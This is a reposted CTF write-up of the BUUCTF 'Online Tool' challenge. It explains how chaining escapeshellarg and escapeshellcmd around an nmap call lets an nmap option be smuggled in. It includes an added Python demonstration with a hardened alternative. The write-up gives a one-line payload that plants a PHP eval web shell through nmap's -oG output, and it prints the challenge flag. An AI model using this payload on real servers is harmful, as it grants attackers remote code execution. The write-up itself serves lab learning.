BUUCTF WEB [BUUCTF 2018]Online Tool
2022-04-23 12:27:00 【Y1Daa】
-
Entering the environment, we are shown the following source code:
<?php
if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) {
    $_SERVER['REMOTE_ADDR'] = $_SERVER['HTTP_X_FORWARDED_FOR'];
}

if(!isset($_GET['host'])) {
    highlight_file(__FILE__);
} else {
    $host = $_GET['host'];
    $host = escapeshellarg($host);
    $host = escapeshellcmd($host);
    $sandbox = md5("glzjin". $_SERVER['REMOTE_ADDR']);
    echo 'you are in sandbox '.$sandbox;
    @mkdir($sandbox);
    chdir($sandbox);
    echo system("nmap -T5 -sT -Pn --host-timeout 2 -F ".$host);
}
Here, escapeshellarg() turns a string into a single argument that can be used safely in a shell command: it escapes special characters such as the single quote, and wraps each escaped single quote in two additional single quotes on either side.
<?php
echo escapeshellarg("123");   // '123'
echo escapeshellarg("12' 3"); // '12'\'' 3'
?>
escapeshellcmd() escapes shell metacharacters: it inserts a \ before special characters and before any single quote that has no matching partner.
<?php
echo escapeshellcmd("123");    // 123
echo escapeshellcmd("12' 3");  // 12\' 3
echo escapeshellcmd("12'' 3"); // 12'' 3
?>
For how these two functions interact and how this challenge is solved, see the article 谈谈escapeshellarg参数绕过和注入的问题 (lmxspace.com).
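The interaction described above, as an added example that is not part of the original writeup: a Python re-implementation of the POSIX behaviour of both PHP functions (written from the logic in PHP's ext/standard/exec.c, an assumption about fidelity), run through shlex to show the argv the shell actually hands to nmap when the two are chained in the challenge's order, next to an allowlist-based builder that never goes through a shell. The probe value and the `-F` flag are illustrative.

```python
import re
import shlex

def escapeshellarg(s: str) -> str:
    """POSIX behaviour of PHP's escapeshellarg(): wrap in single quotes,
    turning every embedded ' into '\\'' (re-implementation, assumption)."""
    return "'" + s.replace("'", "'\\''") + "'"

# Characters escapeshellcmd() prefixes with a backslash on POSIX.
_META = set("#&;`|*?~<>^()[]{}$\\\n\xff")

def escapeshellcmd(s: str) -> str:
    """POSIX behaviour of PHP's escapeshellcmd(): backslash every shell
    metacharacter, and a quote only when it has no partner later on."""
    out, open_q = [], None
    for i, c in enumerate(s):
        if c in "'\"":
            if open_q is None:
                if s.find(c, i + 1) != -1:
                    open_q = c            # paired quote: left untouched
                else:
                    out.append("\\")      # unpaired quote: escaped
            elif open_q == c:
                open_q = None             # closing partner of the pair
            else:
                out.append("\\")          # the other quote kind inside a pair
        elif c in _META:
            out.append("\\")
        out.append(c)
    return "".join(out)

def shell_argv(host: str, double_escape: bool) -> list[str]:
    """argv that /bin/sh would hand to nmap for the given host value."""
    arg = escapeshellarg(host)
    if double_escape:
        arg = escapeshellcmd(arg)         # the challenge's vulnerable order
    return shlex.split("nmap -F " + arg)

# Hardened alternative: allowlist the host and skip the shell entirely.
_HOST_RE = re.compile(r"[A-Za-z0-9][A-Za-z0-9.-]{0,252}")

def safe_argv(host: str) -> list[str]:
    """Build an argv list for subprocess.run(..., shell=False)."""
    if not _HOST_RE.fullmatch(host):
        raise ValueError("host must be a bare hostname or IPv4 address")
    return ["nmap", "-F", host]

if __name__ == "__main__":
    probe = "' -oG out.txt '"            # constructed probe, no payload
    print(shell_argv(probe, double_escape=False))  # one argument, harmless
    print(shell_argv(probe, double_escape=True))   # -oG becomes its own argument
```

With escapeshellarg() alone the whole probe stays one quoted argument; after escapeshellcmd() re-escapes the backslashes, the middle of the string is left unquoted and the shell splits it into separate nmap options.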
-
Because both filters are applied, only a single command can be executed, with no chaining. nmap, however, has several output options:
OUTPUT: -oN/-oX/-oS/-oG <file>: Output scan in normal, XML, s|<rIpt kIddi3, and Grepable format, respectively, to the given filename.
These write the command line and the scan results into a file.
-
Here we can use the flaw that arises when escapeshellarg and escapeshellcmd are chained together to turn this into command execution:
?host=' <?php @eval($_POST["cmd"]);?> -oG shell.php '
The response is:
you are in sandbox ae49321bc77b6271cb2db4ba23d835f1Starting Nmap 7.70 ( https://nmap.org ) at 2022-04-22 05:26 UTC
Nmap done: 0 IP addresses (0 hosts up) scanned in 1.15 seconds
Nmap done: 0 IP addresses (0 hosts up) scanned in 1.15 seconds
-
Connect with AntSword (蚁剑) and find the flag file in the filesystem root:
flag{24d949bf-db37-41b9-9e74-9f9e202d0af7}
Copyright notice
This article was written by [Y1Daa]; please include the original link when reposting. Thanks.
https://blog.csdn.net/weixin_51412071/article/details/124343895